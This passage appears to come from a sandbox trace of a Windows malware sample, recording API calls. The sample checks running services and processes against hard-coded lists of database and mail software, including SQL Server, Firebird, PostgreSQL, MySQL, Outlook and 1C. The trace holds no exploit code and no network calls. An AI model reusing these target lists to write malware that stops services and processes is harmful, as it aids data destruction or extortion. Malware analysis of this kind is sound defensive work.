10 [0030.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0030.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0030.796] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0030.796] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0030.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0030.796] lstrlenW (lpString="DcomLaunch") returned 10 [0030.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0030.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0030.796] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0030.796] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0030.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0030.796] lstrlenW (lpString="Dhcp") returned 4 [0030.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0030.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0030.796] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0030.796] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0030.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0030.796] lstrlenW (lpString="Dnscache") returned 8 [0030.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0030.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0030.796] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0030.796] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0030.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0030.796] lstrlenW (lpString="DPS") returned 3 [0030.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0030.796] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0030.796] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0030.796] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0030.796] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0030.796] lstrlenW (lpString="eventlog") returned 8 [0030.796] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0030.797] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0030.797] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0030.797] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0030.797] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0030.797] lstrlenW (lpString="EventSystem") returned 11 [0030.797] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0030.797] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0030.797] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0030.797] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0030.797] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0030.797] lstrlenW (lpString="gpsvc") returned 5 [0030.797] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0030.797] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0030.797] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0030.797] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0030.797] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0030.797] lstrlenW (lpString="iphlpsvc") returned 8 [0030.797] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0030.797] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0030.797] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0030.797] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0030.797] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0030.797] lstrlenW (lpString="LanmanServer") returned 12 [0030.797] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0030.797] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0030.797] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0030.797] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0030.797] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0030.797] lstrlenW (lpString="LanmanWorkstation") returned 17 [0030.797] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0030.797] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0030.797] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0030.797] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0030.797] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0030.797] lstrlenW (lpString="lmhosts") returned 7 [0030.797] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0030.797] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0030.797] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0030.797] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0030.798] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0030.798] lstrlenW (lpString="MMCSS") returned 5 [0030.798] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0030.798] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0030.798] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0030.798] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0030.798] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0030.798] lstrlenW (lpString="MpsSvc") returned 6 [0030.798] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0030.798] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0030.798] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0030.798] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0030.798] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0030.798] lstrlenW (lpString="Netman") returned 6 [0030.798] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0030.798] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0030.798] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0030.798] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0030.798] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0030.798] lstrlenW (lpString="netprofm") returned 8 [0030.798] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0030.798] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0030.798] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0030.798] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0030.798] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0030.798] lstrlenW (lpString="NlaSvc") returned 6 [0030.798] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0030.798] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0030.798] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0030.798] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0030.798] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0030.798] lstrlenW (lpString="nsi") returned 3 [0030.798] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0030.798] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0030.798] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0030.798] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0030.798] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0030.798] lstrlenW (lpString="PcaSvc") returned 6 [0030.799] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0030.799] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0030.799] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0030.799] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0030.799] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0030.799] lstrlenW (lpString="PlugPlay") returned 8 [0030.799] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0030.799] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0030.799] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0030.799] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0030.799] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0030.799] lstrlenW (lpString="Power") returned 5 [0030.799] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0030.799] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0030.799] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0030.799] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0030.799] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0030.799] lstrlenW (lpString="ProfSvc") returned 7 [0030.799] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0030.799] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0030.799] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0030.799] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0030.799] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0030.799] lstrlenW (lpString="RpcEptMapper") returned 12 [0030.799] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0030.799] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0030.799] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0030.799] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0030.799] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0030.799] lstrlenW (lpString="RpcSs") returned 5 [0030.799] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0030.799] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0030.799] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0030.799] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0030.799] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0030.799] lstrlenW (lpString="SamSs") returned 5 [0030.799] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0030.799] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0030.800] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0030.800] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0030.800] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0030.800] lstrlenW (lpString="Schedule") returned 8 [0030.800] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0030.800] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0030.800] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0030.800] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0030.800] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0030.800] lstrlenW (lpString="SENS") returned 4 [0030.800] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0030.800] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0030.800] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0030.800] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0030.800] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0030.800] lstrlenW (lpString="ShellHWDetection") returned 16 [0030.800] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0030.800] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0030.800] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0030.800] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0030.800] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0030.800] lstrlenW (lpString="Spooler") returned 7 [0030.800] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0030.800] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0030.800] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0030.800] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0030.800] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0030.800] lstrlenW (lpString="SysMain") returned 7 [0030.800] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0030.800] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0030.800] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0030.800] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0030.800] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0030.800] lstrlenW (lpString="Themes") returned 6 [0030.800] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0030.800] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0030.800] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0030.800] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0030.800] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0030.801] lstrlenW (lpString="TrkWks") returned 6 [0030.801] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0030.801] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0030.801] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0030.801] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0030.801] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0030.801] lstrlenW (lpString="UxSms") returned 5 [0030.801] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0030.801] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0030.801] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0030.801] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0030.801] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0030.801] lstrlenW (lpString="WdiServiceHost") returned 14 [0030.801] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0030.801] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0030.801] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0030.801] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0030.801] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0030.801] lstrlenW (lpString="WdiSystemHost") returned 13 [0030.801] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0030.801] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0030.801] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0030.801] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0030.801] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0030.801] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0030.801] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0030.801] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0030.801] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0030.801] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0030.801] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0030.801] lstrlenW (lpString="Winmgmt") returned 7 [0030.801] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0030.801] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0030.801] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0030.801] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0030.801] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0030.801] lstrlenW (lpString="WPDBusEnum") returned 10 [0030.801] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0030.801] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0030.802] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0030.802] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0030.802] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0030.802] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6291e8 | out: hHeap=0x5f0000) returned 1 [0030.802] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0030.808] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0030.809] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0030.809] lstrlenW (lpString="System") returned 6 [0030.809] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0030.809] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0030.809] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0030.809] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0030.810] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0030.810] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0030.810] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0030.810] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0030.810] lstrlenW (lpString="smss.exe") returned 8 [0030.810] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0030.810] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0030.810] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0030.810] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0030.810] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0030.810] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0030.810] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0030.810] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0030.811] lstrlenW (lpString="csrss.exe") returned 9 [0030.811] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0030.811] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0030.811] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0030.811] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0030.811] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0030.811] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0030.811] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0030.811] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0030.812] lstrlenW (lpString="wininit.exe") returned 11 [0030.812] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0030.812] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0030.812] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0030.812] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0030.812] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0030.812] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0030.812] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0030.812] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0030.813] lstrlenW (lpString="csrss.exe") returned 9 [0030.813] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0030.813] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0030.813] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0030.813] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0030.813] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0030.813] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0030.813] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0030.813] lstrlenW (lpString="winlogon.exe") returned 12 [0030.813] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0030.814] lstrlenW (lpString="services.exe") returned 12 [0030.814] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0030.814] lstrlenW (lpString="lsass.exe") returned 9 [0030.814] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0030.815] lstrlenW (lpString="lsm.exe") returned 7 [0030.815] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.815] lstrlenW (lpString="svchost.exe") returned 11 [0030.815] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.816] lstrlenW (lpString="svchost.exe") returned 11 [0030.816] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.817] lstrlenW (lpString="svchost.exe") returned 11 [0030.817] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.817] lstrlenW (lpString="svchost.exe") returned 11 [0030.817] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x57, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0030.818] lstrlenW (lpString="svchost.exe") returned 11 [0030.818] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0030.818] lstrlenW (lpString="audiodg.exe") returned 11 